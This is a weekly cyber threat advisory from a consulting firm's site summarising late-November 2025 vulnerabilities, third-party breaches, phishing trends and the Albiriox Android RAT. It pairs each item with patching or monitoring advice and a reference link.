Global Site
Argentina Aruba Barbados Bolivia Brazil Canada Cayman Islands Chile Colombia Costa Rica Curacao El Salvador Guatemala Honduras Mexico Paraguay Peru Puerto Rico Saint Martin Suriname United States Uruguay Venezuela
Australia Cambodia China Hawaii Hong Kong India Indonesia Japan Macau Malaysia Maldives Mongolia Myanmar Nepal New Zealand Pakistan Philippines Singapore South Korea Sri Lanka Taiwan Thailand Vietnam
Albania Andorra Armenia Austria Azerbaijan Belgium Bulgaria Croatia Cyprus Czech Republic Denmark Estonia Finland France Georgia Germany Greece Hungary Ireland Italy Kazakhstan Kosovo Latvia Lithuania Luxembourg Malta Moldova Netherlands Norway Poland Portugal Romania Serbia Slovakia Slovenia Spain Sweden Switzerland Tajikistan Turkey Ukraine United Kingdom Uzbekistan
Algeria Angola Bahrain Egypt Ghana Israel Jordan Kenya Kuwait Lebanon Liberia Mauritius Morocco Mozambique Nigeria Oman Qatar Saudi Arabia Senegal Sierra Leone South Africa Tanzania Togo Tunisia Uganda United Arab Emirates Yemen
Contact Us
home News
Cyber Threat Advisory

Cybersecurity Alert: 24–30 November 2025 Cyber Threat Advisory 

12/8/2025
Cyber Threat Advisory

The week of November 24–30, 2025 saw a wave of high-impact security developments across cloud, AI, IAM, and industrial environments. Critical vulnerabilities were disclosed in NVIDIA’s NeMo Agent Toolkit, Fluent Bit, and Apache Syncope, exposing organizations to server-side request forgery, remote code execution, and credential compromise. At the same time, third‑party breaches at OpenAI’s analytics provider and Gainsight’s Salesforce integration underscored the risks of SaaS and ecosystem dependencies. Rounding out the week, large-scale phishing and gaming-related attacks, the emergence of the Albiriox Android banking RAT, and active exploitation of an ICS XSS flaw highlighted how attackers are simultaneously targeting consumers, financial platforms, and industrial systems, demanding urgent patching, monitoring, and strengthened third‑party risk management.

1. Critical Vulnerabilities

1.1 NVIDIA NeMo Agent Toolkit SSRF Vulnerability (CVE-2025-33203)
NVIDIA disclosed a high‑severity SSRF flaw (CVSS 7.6) in the NeMo Agent Toolkit UI for Web, affecting all versions prior to 1.3.0. An authenticated low‑privilege user can abuse the chat API to trigger unintended server‑side requests, leading to information disclosure and potential denial of service.

Action: Upgrade to NeMo Agent Toolkit v1.3.0 or later.

Reference: https://nvidia.custhelp.com/app/answers/detail/a_id/5726

1.2 Fluent Bit: Multiple Vulnerabilities Enabling Cloud Takeover (CVE-2025-12972/70/78/77/69)

Oligo Security reported five vulnerabilities in Fluent Bit (pre‑4.1.1 and pre‑4.0.12), including a critical input‑plugin bug (CVSS 9.1) that can enable RCE, log manipulation, and path traversal. Other issues include a stack buffer overflow in the Docker input, authentication bypass in the forward input, tag spoofing, and arbitrary file writes via the file output plugin.

Action: Upgrade Fluent Bit to 4.1.1 or 4.0.12; verify cloud/container images and managed services are on patched builds.

Reference: https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover

1.3 Apache Syncope Hardcoded AES Key (CVE-2025-65998)

Apache Syncope (2.1.0–2.1.14, 3.0.0–3.0.14, 4.0.0–4.0.2) uses a hardcoded AES encryption key for password storage when AES-based password encryption is enabled, scoring 7.5 (High). Attackers with database access can decrypt all affected passwords.

Action: Upgrade to Syncope 3.0.15 or 4.0.3 and review whether AES password encryption was enabled.

Reference: https://syncope.apache.org/security.html

2. Notable Security Incidents

2.1 OpenAI User Metadata Exposure via Mixpanel Breach

A breach at OpenAI’s third‑party analytics provider Mixpanel exposed API user metadata (names, emails, OS, environment details, and account IDs). No passwords, payment data, chats, or API keys were exposed, but the leaked information raises phishing and targeted attack risk.

Action: Warn developers and API users about targeted phishing; reinforce account hygiene and MFA.

Reference: https://openai.com/index/mixpanel-incident/

2.2 Gainsight–Salesforce OAuth Token Incident

Salesforce detected compromised OAuth tokens tied to Gainsight’s connected app and temporarily disabled the integration. Gainsight reports that only a small number of customers were affected and is providing direct support while investigations with external experts continue.

Action: Affected Salesforce/Gainsight customers should follow vendor guidance, rotate credentials, and validate integration access logs.

Reference: https://www.gainsight.com/blog/supporting-our-customers-and-community-an-update-on-the-recent-security-advisory-related-to-gainsight/

3. Threat Landscape & Campaigns

3.1 Surge in Shopping and Gaming Phishing (Kaspersky)

Kaspersky blocked 6.39 million shopping-related phishing attempts from January–October 2025, with nearly half targeting online shoppers around major sales events. Over 20 million attacks hit gaming platforms, including 18.56 million malware detections via Discord, alongside significant phishing against Netflix and Spotify.

Action: Bolster seasonal fraud awareness; tighten controls around gaming/streaming services in corporate environments where applicable.

Reference: https://me-en.kaspersky.com/about/press-releases/kaspersky-reports-64-million-shopping-phishing-attempts-and-over-20-million-gaming-attacks-detected-in-2025

3.2 Albiriox: New Android RAT Targeting Finance & Crypto

Cleafy identified Albiriox, a MaaS Android RAT focused on on‑device banking and crypto fraud, using droppers (e.g., fake Penny Market app) and abusing Accessibility Services. It supports screen streaming, overlays, keylogging, and VNC-style remote control to bypass 2FA and perform real‑time fraudulent transactions.

Action: Strengthen mobile security controls, app vetting, and user training; monitor for suspicious Android app installs and banking anomalies.

Reference: https://www.cleafy.com/cleafy-labs/albiriox-rat-mobile-malware-targeting-global-finance-and-crypto-wallets

3.3 OpenPLC ScadaBR XSS Added to CISA KEV (CVE-2021-26829)

CISA added a long‑known ScadaBR XSS flaw to its Known Exploited Vulnerabilities catalog after confirming active exploitation in OpenPLC ScadaBR deployments. The bug affects system_settings.shtm in ScadaBR up to 1.12.4 (Windows) and 0.9.1 (Linux), enabling session hijacking and unauthorized configuration changes.

Action: Immediately patch or segment affected ICS/SCADA systems; FCEB agencies must remediate by 19 December 2025 and review any products embedding ScadaBR components.

Reference: https://cybersecuritynews.com/cisa-openplc-scadabr-vulnerability/

Summary

Vulnerability Details

  • NVIDIA NeMo Agent Toolkit SSRF Vulnerability (CVE-2025-33203)
  • Fluent Bit Multiple Vulnerabilities Expose Cloud Services to Takeover (CVE-2025-12972,
  • -12970, -12978, -12977, -12969)
  • Apache Syncope Hardcoded Encryption Key Vulnerability (CVE-2025-65998)

Attack Campaigns

  • OpenAI third-party analytics breach exposes user metadata via Mixpanel compromise
  • Gainsight Issues Update After Salesforce Disconnects Integration Over Security Incident

Security News

  • Kaspersky Reports 6.4 Million Shopping Phishing Attempts and 20 Million Gaming Attacks in 2025
  • Albiriox Exposed: A New RAT Mobile Malware Targeting Global Finance and Crypto Wallets
  • CISA Adds OpenPLC ScadaBR XSS Vulnerability (CVE-2021-26829) to KEV Following Active Exploitation

Cyber resilience is more vital than ever—share to spread awareness and stay protected.

Stay secure. Stay informed.

From Crowe UAE Cyber Threat Management Services

Visit: Cyber Threat Management & Security Services UAE | Crowe UAE

Schedule a Consultation: +971 542468006 | [email protected]

Crowe UAE Cyber Security Operation Centre: SOC | 24/7 Cybersecurity Monitoring & Rapid Threat Response | Crowe UAE